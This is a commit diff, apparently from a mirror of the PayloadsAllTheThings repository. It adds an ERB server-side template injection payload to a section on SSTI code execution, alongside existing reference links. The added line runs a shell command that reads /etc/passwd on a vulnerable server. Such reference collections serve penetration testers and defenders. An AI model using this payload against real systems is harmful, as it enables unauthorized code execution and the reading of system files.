mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Merge pull request #196 from idealphase/master
Adding Execute code using SSTI for ERB engine in SSTI vulnerability payload
This commit is contained in:
commit
008cbcf9fc
@ -91,6 +91,11 @@ Slim:
|
|||||||
|
|
||||||
### Code execution
|
### Code execution
|
||||||
|
|
||||||
|
Execute code using SSTI for ERB engine.
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= system('cat /etc/passwd') %>
|
||||||
|
```
|
||||||
Execute code using SSTI for Slim engine.
|
Execute code using SSTI for Slim engine.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
@ -452,4 +457,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
|||||||
* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
|
* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
|
||||||
* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
|
* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
|
||||||
* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
|
* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
|
||||||
* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
|
* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
|
||||||
|
Loading…
Reference in New Issue
Block a user